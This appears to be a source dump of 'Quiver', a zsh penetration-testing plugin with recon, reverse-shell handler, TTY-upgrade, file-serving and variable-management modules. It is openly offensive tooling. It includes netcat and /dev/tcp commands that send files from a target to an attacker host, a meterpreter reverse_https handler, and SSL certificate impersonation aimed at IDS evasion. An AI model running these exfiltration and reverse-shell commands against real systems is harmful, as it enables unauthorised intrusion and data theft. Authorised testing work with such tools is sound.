https://cse.google.com/cse/all to create a custom search engine" } ================================================ FILE: modules/qq-recon-subs.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-recon-subs ############################################################# qq-recon-subs-help() { cat << "DOC" qq-recon-subs ------------- The recon namespace provides commands to recon vertical sub-domains of a root domain. All subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$DOMAIN/subs.txt. You can sort unique this file in place with the "sfu" alias. Commands -------- qq-recon-subs-install: installs dependencies Commands - enumeration ---------------------- qq-recon-subs-amass-enum: enumerate subdomains into amass db (api keys help) qq-recon-subs-amass-diff: track changes between last 2 enumerations using amass db qq-recon-subs-amass-names: list gathered subs in the amass db qq-recon-subs-crt.sh: gather subdomains from crt.sh qq-recon-subs-subfinder: gather subdomains from sources (api keys help) qq-recon-subs-assetfinder: gather subdomains from sources (api keys help) qq-recon-subs-wayback: gather subdomains from Wayback Machine Commands - brute force ---------------------- qq-recon-subs-brute-massdns: try to resolve a list of subdomains generated for brute forcing qq-recon-subs-gen-wordlist: generate a wordlist of possible sub domains Commands - processing --------------------- qq-recon-subs-resolve-massdns: resolve a file of subdomains using massdns qq-recon-subs-resolve-parse: parse resolved.txt into A, CNAME and IP's DOC } qq-recon-subs-install() { __info "Running $0..." __pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils qq-install-golang go get -u github.com/projectdiscovery/subfinder/cmd/subfinder go get -u github.com/tomnomnom/assetfinder go get -u github.com/tomnomnom/waybackurls qq-install-massdns } qq-recon-subs-amass-enum() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/amass print -z "amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass" } qq-recon-subs-amass-diff() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/amass print -z "amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass" } qq-recon-subs-amass-names() { __check-project qq-vars-set-domain mkdir -p ${__PROJECT}/amass print -z "amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt" } qq-recon-subs-crt.sh() { __check-project qq-vars-set-domain print -z "curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \"${__DOMAIN}\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \" \" | sort -u | tee -a $(__dompath)/subs.txt " } qq-recon-subs-subfinder() { __check-project qq-vars-set-domain __check-threads print -z "subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt" } qq-recon-subs-assetfinder() { __check-project qq-vars-set-domain print -z "echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt" } qq-recon-subs-wayback() { __check-project qq-vars-set-domain print -z "echo ${__DOMAIN} | waybackurls | cut -d "/" -f3 | sort -u | grep -v \":80\" | tee -a $(__dompath)/subs.txt" } qq-recon-subs-resolve-massdns() { __check-project __check-resolvers qq-vars-set-domain print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved.txt $(__dompath)/subs.txt" } qq-recon-subs-brute-massdns() { __check-project __check-resolvers qq-vars-set-domain __ask "Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)" local f && __askpath f FILE $(__dompath) print -z "massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved-brute.txt $f" } qq-recon-subs-resolve-parse() { __check-project qq-vars-set-domain __info "Generating files resolved-*.txt" grep -ie "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt grep -v "CNAME" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt grep -v "CNAME" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt } qq-recon-subs-gen-wordlist() { __check-project qq-vars-set-domain local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt print -z "for s in \$(cat ${f}); do echo \$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done" } ================================================ FILE: modules/qq-scripts.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-scripts ############################################################# # qq-scripts-help() { # cat << "DOC" # qq-scripts # ------- # The scripts namespace runs scripts from the quiver # scripts directory. # ** IN DEVELOPMENT, NOT READY FOR USE ** # Commands # -------- # qq-scripts-recon: a zsh recon script # qq-scripts-webrecon: a zsh webrecon script # DOC # } # qq-scripts-recon() { # local d && read "d?$(__cyan DOMAIN: )" # local o && read "o?$(__cyan ORG: )" # local w && read "out?$(__cyan WORKING\(DIR\): )" # print -z "zsh ${__SCRIPTS}/recon.zsh ${d} \"${o}\" \"${w}\"" # } # qq-scripts-webrecon() { # local f=$(rlwrap -S "$(__cyan FILE:\(DOMAINS\))" -e '' -c -o cat) # local w && read "out?$(__cyan WORKING\(DIR\): )" # pushd ${w} # print -z "zsh ${__SCRIPTS}/webrecon.zsh ${f}" # popd # } ================================================ FILE: modules/qq-shell-handlers-msf.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-shell-handlers-msf ############################################################# qq-shell-handlers-msf-help() { cat << "DOC" qq-shell-handlers-msf --------------------- The shell-handlers-msf namespace provides commands for spawning reverse shell connections using metasploit. Commands -------- qq-shell-handlers-msf-install: installs dependencies qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells qq-shell-handlers-msf-w64-multi-https: multi-handler for staged windows/x64/meterpreter/reverse_https payload DOC } qq-shell-handlers-install-msf() { __info "Running $0..." __pkgs metasploit-framework } qq-shell-handlers-msf-ssl-gen() { __ask "Enter the hostname of the site to impersonate" local r && __prefill r SITE aka.ms local cmd="use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit " __info "Use qq-vars-global-set-ssl-shell-cert to the path of the .pem file" print -z "msfconsole -n -q -x \"${cmd}\" " } qq-shell-handlers-msf-w64-https() { qq-vars-set-lhost qq-vars-set-lport __msf << VAR use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST ${__LHOST}; set LPORT ${__LPORT}; set HANDLERSSLCERT ${__SHELL_SSL_CERT}; set EXITONSESSION false run; exit VAR } ================================================ FILE: modules/qq-shell-handlers.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-shell-handlers ############################################################# qq-shell-handlers-help() { cat << "DOC" qq-shell-handlers ----------------- The shell-handlers namespace provides commands for spawning reverse shell connections. Commands -------- qq-shell-handlers-install: installs dependencies qq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells qq-shell-handlers-nc: qq-shell-handlers-ncrl: qq-shell-handlers-nc-udp: qq-shell-handlers-socat: DOC } qq-shell-handlers-install() { __info "Running $0..." __pkgs netcat socat } # netcat qq-shell-handlers-nc() { qq-vars-set-lport print -z "nc -nlvp ${__LPORT}" } qq-shell-handlers-ncrl() { qq-vars-set-lport print -z "rlwrap nc -nlvp ${__LPORT}" } qq-shell-handlers-nc-udp() { qq-vars-set-lport print -z "nc -nlvu ${__LPORT}" } # socat qq-shell-handlers-socat() { qq-vars-set-lport print -z "socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}" } ================================================ FILE: modules/qq-shell-tty.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-shell-tty ############################################################# qq-shell-tty-help() { cat << "DOC" qq-shell-tty ------------ The shell-tty namespace provides commands for fixing interactive command/reverse shells. Commands -------- qq-shell-tty-python2: command to spawn a tty shell qq-shell-tty-python3: command to spawn a tty shell qq-shell-tty-perl: command to spawn a tty shell qq-shell-tty-ruby: command to spawn a tty shell qq-shell-tty-lua: command to spawn a tty shell qq-shell-tty-expect: command to spawn a tty shell DOC } qq-shell-tty-python2() { __ok "Copy the commands below and use on the remote system" cat << "DOC" python -c 'import pty;pty.spawn("/bin/sh")' DOC } qq-shell-tty-python3() { __ok "Copy the commands below and use on the remote system" cat << "DOC" python3 -c 'import pty;pty.spawn("/bin/sh")' DOC } qq-shell-tty-perl() { __ok "Copy the commands below and use on the remote system" cat << "DOC" perl -e 'exec "/bin/sh";' DOC } qq-shell-tty-ruby() { __ok "Copy the commands below and use on the remote system" cat << "DOC" ruby: exec "/bin/sh" DOC } qq-shell-tty-lua() { __ok "Copy the commands below and use on the remote system" cat << "DOC" lua: os.execute('/bin/sh') DOC } qq-shell-tty-expect() { __ok "Copy the commands below and use on the remote system" cat << "DOC" /usr/bin/expect sh DOC } ================================================ FILE: modules/qq-srv.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-srv ############################################################# qq-srv-help() { cat << "DOC" qq-srv ------- The srv namespace provides commands for hosting local services such as web, ftp, smb and other services for data exfil or transfer. Commands -------- qq-srv-install: install dependencies qq-srv-web: hosts a python3 web server in current dir qq-srv-ftp: hosts a python3 ftp server in current dir qq-srv-smb: hosts an impacket smb server in current dir qq-srv-tftp: starts the atftpd service in /srv/tftp qq-srv-smtp: hosts a python3 smtp server in current dir qq-srv-updog: hosts an updog web server in current dir qq-srv-nc-tar: hosts a netcat server > tar file in current dir qq-srv-nc-file: hosts a netcat server > file in current dir qq-srv-web-hosted: hosts a python3 web server in /srv, port as $1 qq-srv-php-hosted: hosts a php web server in /srv, port as $1 qq-srv-ftp-hosted: hosts a python3 ftp server in /srv qq-srv-updog-hosted: hosts an updog web server in /srv DOC } qq-srv-install() { __info "Running $0..." __pkgs netcat atftpd __pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts sudo pip3 install updog } qq-srv-web() print -z "sudo python3 -m http.server 80" qq-srv-ftp() print -z "sudo python3 -m pyftpdlib -p 21 -w" qq-srv-smb() print -z "sudo impacket-smbserver -smb2supp F ." qq-srv-tftp() print -z "sudo service atftpd start" qq-srv-smtp() print -z "sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25" qq-srv-web-hosted() { __info "Serving content from /srv" if [ "$#" -eq "1" ] then pushd /srv &> /dev/null sudo python3 -m http.server $1 popd &> /dev/null else pushd /srv &> /dev/null sudo python3 -m http.server 80 popd &> /dev/null fi } qq-srv-php-hosted() { __info "Serving content from /srv" if [ "$#" -eq "1" ] then pushd /srv &> /dev/null sudo php -S 0.0.0.0:$1 popd &> /dev/null else pushd /srv &> /dev/null sudo php -S 0.0.0.0:80 popd &> /dev/null fi } qq-srv-ftp-hosted() { __info "Serving content from /srv" pushd /srv &> /dev/null sudo python3 -m pyftpdlib -p 21 -w popd &> /dev/null } qq-srv-updog() { print -z "updog -p 443 --ssl -p $(__rand 10)" } qq-srv-updog-hosted() { __info "Serving content from /srv" sudo updog -p 443 --ssl -d /srv } qq-srv-nc-tar() { qq-vars-set-lhost qq-vars-set-lport __cyan "Use the command below on the target system: " echo "tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}" print -z "nc -nvlp ${__LPORT} | tar xfv -" } qq-srv-nc-file() { qq-vars-set-lhost qq-vars-set-lport __cyan "Use the command below on the target system: " echo "cat FILE > /dev/tcp/${__LHOST}/${__LPORT}" print -z "nc -nvlp ${port} -w 5 > incoming.txt" } qq-srv-nc-b64() { qq-vars-set-lhost qq-vars-set-lport __cyan "Use the command below on the target system: " echo "openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}" print -z "nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt" } ================================================ FILE: modules/qq-vars-global.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-vars-global ############################################################# qq-vars-global-help() { cat << "DOC" qq-vars-global -------------- The vars global namespace manages environment variables used in other functions that are saved between sessions. Values are stored as files the .quiver/globals directory and can contain sensitive information like API keys. These variables are used to supply arguments to commands in other modules. Variables --------- __IMPACKET: full path to the python3 impacket examples directory __EXT_PHP: a list of file extensions used on PHP webservers __EXT_DOCS: a list of common documents file types __API_GITHUB: your personal Github API key __RESOLVERS: path to public resolvers file __NOTES: path to the directory containing your markdown notes for qq-notes __MNU_UA: path to the file containing user-agent strings __MNU_WORDLISTS: path to the file containing a list of favorite wordlists __TCP_PORTS: path to the file of favorite TCP ports __SHELL_SSL_CERT: path to the file of an impersonated SSL cert used for reverse shell IDS evasion __ALIASES: path to the file containing aliases that will be sourced Commands -------- qq-vars-global: list all current global variable values qq-vars-global-set-*: used to set and save each individual variable DOC } qq-vars-global() { echo "$(__cyan IMPACKET: ) ${__IMPACKET}" echo "$(__cyan EXT_PHP: ) ${__EXT_PHP}" echo "$(__cyan EXT_DOCS: ) ${__EXT_DOCS}" echo "$(__cyan API_GITHUB: ) ${__API_GITHUB}" echo "$(__cyan NOTES: ) ${__NOTES}" echo "$(__cyan RESOLVERS: ) ${__RESOLVERS}" echo "$(__cyan MNU_UA: ) ${__MNU_UA}" echo "$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}" echo "$(__cyan TCP_PORTS: ) ${__TCP_PORTS}" echo "$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}" echo "$(__cyan ALIASES: ) ${__ALIASES}" } ########## __IMPACKET export __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo "/usr/share/doc/python3-impacket/examples/") qq-vars-global-set-impacket() { __ask "Set the full path to the python3-impacket/examples directory." __askpath __IMPACKET DIR / echo "${__IMPACKET}" > ${__GLOBALS}/IMPACKET } __check-impacket() { [[ -z "${__PROJECT}" ]] && qq-vars-global-set-impacket } ########## __EXT_PHP export __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo "php,phtml,pht,xml,inc,log,sql,cgi") qq-vars-global-set-ext-php() { __ask "Enter a csv list of PHP server file extensions, ex: php,php3,pht" __askvar __EXT_PHP EXTENSIONS echo "${__EXT_PHP}" > ${__GLOBALS}/EXT_PHP } __check-ext-php() { [[ -z "${__EXT_PHP}" ]] && qq-vars-global-set-ext-php } ########## __EXT_DOCS export __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOC 2> /dev/null || echo "doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml") qq-vars-global-set-ext-docs() { __ask "Enter a csv list of document file extensions, ex: doc,xls,ppt" __askvar __EXT_DOCS EXTENSIONS echo "${__EXT_DOCS}" > ${__GLOBALS}/EXT_DOCS } __check-ext-docs() { [[ -z "${__EXT_DOCS}" ]] && qq-vars-global-set-ext-docs } ########## __API_GITHUB export __API_GITHUB="$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)" qq-vars-global-set-api-github() { __ask "Enter your github API key below." __askvar __API_GITHUB API_GITHUB echo "${__API_GITHUB}" > ${__GLOBALS}/API_GITHUB } __check-api-github() { [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github } ########## __API_GOOGLE_DOMAINS export __API_GOOGLE_DOMAINS="$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)" qq-vars-global-set-api-google-domains() { __ask "Enter Google domains username and password for a dynamic DNS domain" local u && __askvar u USERNAME local p && __askvar p PASSWORD local __API_GOOGLE_DOMAINS = $( echo "$u:$p" | base64 ) echo "${__API_GOOGLE_DOMAINS}" > ${__GLOBALS}/API_GOOGLE_DOMAINS } __check-api-github() { [[ -z "${__API_GITHUB}" ]] && qq-vars-global-set-api-github } ########## __RESOLVERS export __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo "${__PAYLOADS}/resolvers.txt") qq-vars-global-set-resolvers() { __ask "Set the full path to the file containing a list of resolvers." __askpath __RESOLVERS FILE $HOME echo "${__RESOLVERS}" > ${__GLOBALS}/RESOLVERS } __check-resolvers() { [[ -z "${__RESOLVERS}" ]] && qq-vars-global-set-resolvers } ########## __NOTES export __NOTES="$(cat ${__GLOBALS}/NOTES 2> /dev/null)" qq-vars-global-set-notes() { __ask "Set the full path to the directory containing markdown notes." __askpath __NOTES DIR $HOME echo "${__NOTES}" > ${__GLOBALS}/NOTES } __check-notes() { [[ -z "${__NOTES}" ]] && qq-vars-global-set-notes } ########## __MNU_UA export __MNU_UA="$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo "${__PAYLOADS}/user-agents.txt")" qq-vars-global-set-mnu-ua() { __ask "Set the full path to the file containing a list of user agent strings" __askpath __MNU_UA FILE $HOME echo "${__MNU_UA}" > ${__GLOBALS}/MNU_UA } ########## __MNU_WORDLISTS export __MNU_WORDLISTS="$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo "${__PAYLOADS}/wordlists.txt")" qq-vars-global-set-mnu-wordlists() { __ask "Set the full path to the file containing a list of favorite wordlists" __askpath __MNU_WORDLISTS FILE $HOME echo "${__MNU_WORDLISTS}" > ${__GLOBALS}/MNU_WORDLISTS } ########## __TCP_PORTS export __TCP_PORTS="$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo "${__PAYLOADS}/tcp-ports.txt")" qq-vars-global-set-tcp-ports() { __ask "Set the full path to the file containing a list of favorite TCP ports" __askpath __TCP_PORTS FILE $HOME echo "${__TCP_PORTS}" > ${__GLOBALS}/TCP_PORTS } ########## __SHELL_SSL_CERT export __SHELL_SSL_CERT="$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo "${__PAYLOADS}/aka.ms.pem")" qq-vars-global-set-shell-ssl-cert() { __ask "Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells" __askpath __SHELL_SSL_CERT FILE $HOME echo "${__SHELL_SSL_CERT}" > ${__GLOBALS}/SHELL_SSL_CERT } ########## __ALIASES export __ALIASES="$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo "${__PAYLOADS}/aliases.rc")" qq-vars-global-set-aliases() { __ask "Set the full path to a file containing shell aliases" __askpath __ALIASES FILE $HOME echo "${__ALIASES}" > ${__GLOBALS}/ALIASES } ================================================ FILE: modules/qq-vars.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq-vars ############################################################# qq-vars-help() { cat << "DOC" qq-vars ------- The vars namespace manages environment variables used in other functions. These variables are set per session, but can be saved with qq-vars-save and reloaded with qq-vars-load. The values are stored as files in .quiver/vars. The menu options for some of the variables can be set using qq-vars-global, such as the list of favorite user-agents or wordlists (qq-vars-global-help). Variables --------- __PROJECT: the root directory used for all output, ex: /projects/example __LOGBOOK: the logbook.md markdown file used in qq-log commands __IFACE: the interface to use for commands, ex: eth0 __DOMAIN: the domain to use for commands, ex: example.org __NETWORK: the subnet to use for commands, ex: 10.1.2.0/24 __RHOST: the remote host or target, ex: 10.1.2.3, example: target.example.org __RPORT: the remote port; ex: 80 __LHOST: the accessible local IP address, ex: 10.1.2.3 __LPORT: the accessible local PORT, ex: 4444 __URL: a target URL, example: https://target.example.org __UA: the user agent to use for commands, ex: googlebot __WORDLIST: path to a wordlist file, ex: /usr/share/wordlists/example.txt __PASSLIST: path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt Commands -------- qq-vars: alias qv, list all current variable values qq-vars-save: alias qvs, save all current variable values ($HOME/.quiver) qq-vars-load: alias qvl, restores all current variable values ($HOME/.quiver) qq-vars-clear: clears all current variable values qq-vars-set-*: used to set each individual variable DOC } qq-vars() { echo "$(__cyan __PROJECT: ) ${__PROJECT}" echo "$(__cyan __LOGBOOK: ) ${__LOGBOOK}" echo "$(__cyan __IFACE: ) ${__IFACE}" echo "$(__cyan __DOMAIN: ) ${__DOMAIN}" echo "$(__cyan __NETWORK: ) ${__NETWORK}" echo "$(__cyan __RHOST: ) ${__RHOST}" echo "$(__cyan __RPORT: ) ${__RPORT}" echo "$(__cyan __LHOST: ) ${__LHOST}" echo "$(__cyan __LPORT: ) ${__LPORT}" echo "$(__cyan __URL: ) ${__URL}" echo "$(__cyan __UA: ) ${__UA}" echo "$(__cyan __WORDLIST: ) ${__WORDLIST}" echo "$(__cyan __PASSLIST: ) ${__PASSLIST}" } alias qv="qq-vars" qq-vars-clear() { __PROJECT="" __LOGBOOK="" __IFACE="" __DOMAIN="" __NETWORK="" __RHOST="" __RPORT="" __LHOST="" __LPORT="" __URL="" __UA="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" __WORDLIST="" __PASSLIST="" } qq-vars-save() { echo "${__PROJECT}" > $__VARS/PROJECT echo "${__LOGBOOK}" > $__VARS/LOGBOOK echo "${__IFACE}" > $__VARS/IFACE echo "${__DOMAIN}" > $__VARS/DOMAIN echo "${__NETWORK}" > $__VARS/NETWORK echo "${__RHOST}" > $__VARS/RHOST echo "${__RPORT}" > $__VARS/RPORT echo "${__LHOST}" > $__VARS/LHOST echo "${__LPORT}" > $__VARS/LPORT echo "${__URL}" > $__VARS/URL echo "${__UA}" > $__VARS/UA echo "${__WORDLIST}" > $__VARS/WORDLIST echo "${__PASSLIST}" > $__VARS/PASSLIST qq-vars } alias qvs="qq-vars-save" qq-vars-load() { __PROJECT=$(cat $__VARS/PROJECT) __LOGBOOK=$(cat $__VARS/LOGBOOK) __IFACE=$(cat $__VARS/IFACE) __DOMAIN=$(cat $__VARS/DOMAIN) __NETWORK=$(cat $__VARS/NETWORK) __RHOST=$(cat $__VARS/RHOST) __RPORT=$(cat $__VARS/RPORT) __LHOST=$(cat $__VARS/LHOST) __LPORT=$(cat $__VARS/LPORT) __URL=$(cat $__VARS/URL) __UA=$(cat $__VARS/UA) __WORDLIST=$(cat $__VARS/WORDLIST) __PASSLIST=$(cat $__VARS/PASSLIST) qq-vars } alias qvl="qq-vars-load" ########## __PROJECT export __PROJECT="" qq-vars-set-project() { __ask "Set the full path to the project root directory where all command output will be directed" local d && __askpath d "PROJECT DIR" ${__PROJECT} [[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return __PROJECT=$d mkdir -p ${__PROJECT} } __check-project() { [[ -z "${__PROJECT}" ]] && qq-vars-set-project } ########## __LOGBOOK export __LOGBOOK="" qq-vars-set-logbook() { __ask "Set the full path to the directory of the logbook file (filename not included)." local d=$(__askpath DIR $HOME) [[ "$d" == "~"* ]] && __err "~ not allowed, use the full path" && return mkdir -p $d __LOGBOOK="${d}/logbook.md" if [[ -f "${__LOGBOOK}" ]]; then __warn "${__LOGBOOK} already exists, set as active log" else touch ${__LOGBOOK} echo "# Logbook" >> ${__LOGBOOK} echo " " >> ${__LOGBOOK} __ok "${__LOGBOOK} created." fi } __check-logbook() { [[ -z "${__LOGBOOK}" ]] && qq-vars-set-logbook } ########## __IFACE export __IFACE="" qq-vars-set-iface() { if [[ -z "${__IFACE}" ]] then __ask "Choose an interface: " __IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}')) else __prefill __IFACE IFACE ${__IFACE} fi } __check-iface() { [[ -z "${__IFACE}" ]] && qq-vars-set-iface } ########## __DOMAIN export __DOMAIN="" qq-vars-set-domain() { __prefill __DOMAIN DOMAIN ${__DOMAIN} } __check-domain() { [[ -z "${__DOMAIN}" ]] && qq-vars-set-domain } ########## __NETWORK export __NETWORK="" qq-vars-set-network() { __prefill __NETWORK NETWORK ${__NETWORK} } __check-network() { [[ -z "${__NETWORK}" ]] && qq-vars-set-network } ########## __RHOST export __RHOST="" qq-vars-set-rhost() { __prefill __RHOST RHOST ${__RHOST} } ########## __RPORT export __RPORT="" qq-vars-set-rport() { __prefill __RPORT RPORT ${__RPORT} } ########## __LHOST export __LHOST="" qq-vars-set-lhost() { if [[ -z $__LHOST ]] then __ask "Choose a local IP address: " __LHOST=$(__menu $(ip addr list | grep -e "inet " | cut -d' ' -f6 | cut -d'/' -f1)) else __prefill __LHOST LHOST ${__LHOST} fi } ########## __LPORT export __LPORT="" qq-vars-set-lport() { __prefill __LPORT LPORT ${__LPORT} } ########## __URL export __URL="" qq-vars-set-url() { local u && __prefill u URL ${__URL} __URL=$(echo ${u} | sed 's/\/$//') } ########## __UA export __UA="Mozilla/5.0" qq-vars-set-ua() { IFS=$'\n' __ask "Choose a user agent: " __UA=$(__menu $(cat ${__MNU_UA})) } __check-ua() { [[ -z "${__UA}" ]] && qq-vars-set-ua } ########## __WORDLIST export __WORDLIST="" qq-vars-set-wordlist() { if [[ -z $__WORDLIST ]] then __ask "Choose a wordlist: " __WORDLIST=$(__menu $(cat ${__MNU_WORDLISTS})) else __WORDLIST= __prefill __WORDLIST WORDLIST ${__WORDLIST} fi } qq-vars-set-wordlist-web() { __ask "Choose a wordlist: " __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/Web-Content | sort)) } qq-vars-set-wordlist-dns() { __ask "Choose a wordlist: " __WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/DNS | sort)) } ########## __PASSLIST export __PASSLIST="/usr/share/wordlists/rockyou.txt" qq-vars-set-passlist() { __ask "Choose a passlist: " __PASSLIST=$(__menu $(find /usr/share/seclists/Passwords | sort)) } # helpers export __THREADS __check-threads() { __askvar __THREADS THREADS } export __USER __check-user() { __askvar __USER USER } export __SHARE __check-share() { __askvar __SHARE SHARE } export __ORG __check-org() { __askvar __ORG ORG } export __ASN __check-asn() { __askvar __ASN ASN } __netpath() { __check-project local net=$(echo ${__NETWORK} | cut -d'/' -f1) local result=${__PROJECT}/networks/${net} mkdir -p "${result}" echo "${result}" } __hostpath() { __check-project local result=${__PROJECT}/hosts/${__RHOST} mkdir -p "${result}" echo "${result}" } __urlpath() { __check-project local host=$(echo ${__URL} | cut -d'/' -f3) local result=${__PROJECT}/hosts/${host} mkdir -p "${result}" echo "${result}" } __dompath() { __check-project local result=${__PROJECT}/domains/${__DOMAIN} mkdir -p "${result}" echo "${result}" } ================================================ FILE: modules/qq.zsh ================================================ #!/usr/bin/env zsh ############################################################# # qq ############################################################# qq-help() { cat << "DOC" qq -- The qq namespace is the root of all other namespaces that can be access with tab-completion. To get started, explore the qq--help commands. Install dependencies per namespace, using the qq--install commands or install all dependencies using qq-install-all. Variables --------- __VERSION Current version of the Quiver plugin __PLUGIN Full path to the Quiver oh-my-zsh plugin directory Commands -------- qq-update: git pull the latest (MASTER branch) version of Quiver qq-status: check the current status of the locally cloned Quiver repository qq-whatsnew: display the latest release notes qq-debug: display the local diagnostic log Namespaces ---------- Quiver is organized in a tree of namespaces that are accessible via "qq-" with tab completion and search. Each namespace has its own install and help commands. Install and Configuration ------------------------- qq-install- Installers for commonly used applications and global installer for all dependencies qq-notes- Configure and read your markdown notes qq-vars-global- Persistent environment variables used in all commands, all sessions Utility --------- qq-encoding- Used for encoding / decoding data qq-kali- Variety of commands for managing Kali linux Engagement / Project / Bounty ----------------------------- qq-log- Configure and setup a logbook for current engagement qq-vars- Per-session, per-engagement variables used in all commands qq-project- Commands to define scope and manage project data qq-project-custom- Commands for custom project directory scaffolding Recon Phase ----------- qq-recon-org- Recon commands for organization files and data qq-recon-github- Recon commands for searching github repositories qq-recon-networks- Recon commands for identiying an organization's networks qq-recon-domains- Recon commands for horizontal domain enumeration qq-recon-subs- Recon commands for vertical sub-domain enumeration Active Enumeration Phase ------------------------ qq-enum-network- Enumerate and scan networks qq-enum-host- Enumerate and scan an individual host qq-enum-dhcp- Enumerate DHCP services qq-enum-dns- Enumerate DNS services qq-enum-ftp- Enumerate FTP services qq-enum-kerb- Enumerate Kerberos services qq-enum-ldap- Enumerate LDAP and Active Directory services qq-enum-mssql- Enumerate MSSQL database services qq-enum-mysql- Enumerate MYSQL database services qq-enum-nfs- Enumerate NFS shares and services qq-enum-oracle- Enumerate Oracle database services qq-enum-pop3- Enumerate POP3 services qq-enum-rdp- Enumerate RDP services qq-enum-smb- Enumerate SMB services qq-enum-web- Enumerate web servers and services qq-enum-web-aws- Enumerate AWS hosted services qq-enum-web-dirs- Enumerate directories and files qq-enum-web-elastic- Enumerate elastic search services qq-enum-web-fuzz- Fuzz inputs such as forms, cookies and headers qq-enum-web-js- Mine javascript files for secrets qq-enum-web-php- Enumerate php web servers qq-enum-web-ssl- Enumerate SSL certs and services qq-enum-web-vuln- Check for common web vulnerabilities qq-enum-web-xss- XSS helpers Exploitation Phase ------------------ qq-srv- Commands for spawning file hosting services qq-exploit- Commands for compiling exploits qq-shell-tty- Commands for upgrading shells to tty qq-shell-handlers- Commands for spawning reverse shell handlers qq-shell-handlers-msf- Commands for spawning reverse shells with Metasploit Post-Exploitation Phase ----------------------- qq-pivot- Commands for pivoting with ssh DOC } qq-update() { cd $HOME/.oh-my-zsh/custom/plugins/quiver git pull rm $__REMOTE_VER rm $__REMOTE_CHK cd - > /dev/null source $HOME/.zshrc } qq-status() { cd $HOME/.oh-my-zsh/custom/plugins/quiver git status | grep On | cut -d" " -f2,3 cd - > /dev/null } qq-whatsnew() { cat $__PLUGIN/RELEASES.md } qq-debug() { cat ${__LOGFILE} } ##### Output Helpers __cyan() echo "$fg[cyan]$@ $reset_color" __green() echo "$fg[green]$@ $reset_color" __blue() echo "$fg[blue]$@ $reset_color" __yellow() echo "$fg[yellow]$@ $reset_color" __err() echo "$fg[red]$@ $reset_color" __info() __blue "[*] $@" __ok() __green "[+] $@" __warn() __yellow "[!] $@" __err() __red "[X] $@" ##### Input Helpers __ask() __yellow "$@" __prompt() __cyan "[?] $@" __askvar() { local retval=$1 local question=$2 local tmpval read "tmpval?$fg[cyan]${question}:$reset_color " eval $retval="'$tmpval'" } __askpath() { local retval=$1 local question=$2 local prefill=$3 local tmpinput=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -c -o cat) local tmpval=$(echo "${tmpinput}" | sed 's/\/$//' ) eval $retval="'$tmpval'" } __prefill() { local retval=$1 local question=$2 local prefill=$3 local tmpval=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -o cat) eval $retval="'$tmpval'" } __check-proceed() { PS3="$fg[cyan]Select: $reset_color" COLUMNS=10 select yn in 